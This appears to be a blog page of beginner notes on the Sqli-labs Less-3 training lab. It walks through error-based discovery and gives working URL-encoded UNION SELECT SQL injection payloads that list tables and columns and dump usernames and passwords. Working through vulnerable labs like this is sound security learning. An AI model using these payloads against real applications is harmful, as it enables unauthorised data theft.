当前位置:网站首页>Sqlilabs-3 (entry notes)
Sqlilabs-3 (entry notes)
2022-07-28 23:02:00 【X also total】
Before that, observe mysql Execute the following command on the database :
Then :
So far, we have found , This id There are already three forms , Integer type / ‘’ / (‘’)
We can construct the corresponding payload
①: direct ?id=’ Prompt will pop up
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1
Because it means sql The query statement uses :Select login_name, select password from table where id= (‘our input here’)
②: Start construction payload:
?id=-1%27)%20union%20select%201,database(),3--+ ( Gather information )
③: Starting basis mysql High version feature injection :
?id=-1%27)union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+
?id=-1%27)union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+
?id=-1%27)union%20select%201,group_concat(username),group_concat(password)%20from%20security.users--+
边栏推荐
- console.log()控制台显示...解决办法
- Es learning directory
- Submission records of frontiers Publishing House (with status changes)
- 高等数学解题常用公式笔记总结
- Nacos配置热更新的4种方式、读取项目配置文件的多种方式,@value,@RefreshScope,@NacosConfigurationProperties
- JS get the current time (year month day hour minute second)
- Written questions and answers of software test interview (software test question bank)
- MySQL常用的日期时间函数
- Improvement 14 of yolov5: replace the backbone network C3 with the lightweight network GhostNet
- Morphology of image
猜你喜欢
Target detection notes - overview and common data sets
Learning experience sharing 4: learning experience of yolov7
console.log()控制台显示...解决办法
Anomaly detection summary: intensity_ based/Normalizing Flow
Cglib create proxy
一种分布式深度学习编程新范式:Global Tensor
简单的es高亮实战
Thesis reading (0) - alexnet of classification
PCA学习
sql优化常用的几种方法
随机推荐
frontiers出版社投稿记录(附状态变化)
RuntimeError: set_ sizes_ contiguous is not allowed on a Tensor created from .data or .detach().
LTE cell search process and sch/bch design
The simple neural network model based on full connection layer MLP is changed to the model based on CNN convolutional neural network
Goer shares and Shanghai Taisi Weida growth cooperation agreement! Special SOC jointly promotes the development of TWS headphones
【复制】互联网术语、简称、缩写
芯华章宣布完成超2亿A轮融资,全面布局EDA2.0研发
Servlet的使用手把手教学(一)
《MySQL数据库进阶实战》读后感(SQL 小虚竹)
投资1450亿欧元!欧盟17国宣布联合发展半导体技术
ValueError: Using a target size (torch.Size([64])) that is different to the input size (torch.Size([
无代码开发平台通讯录导出入门教程
Paper reading: deep forest / deep forest /gcforest
Torch.fft.fft 2. () error reporting problem solution
MySQL Basics - Introduction and basic instructions
Invest 50billion yuan! SMIC capital was officially registered!
Improvement 13 of yolov5: replace backbone network C3 with lightweight network efficientnetv2
It's settled! All products of Nezha s will be launched on July 31
Yolov5 improvement 12: replace backbone network C3 with lightweight network shufflenetv2
No code development platform management background tutorial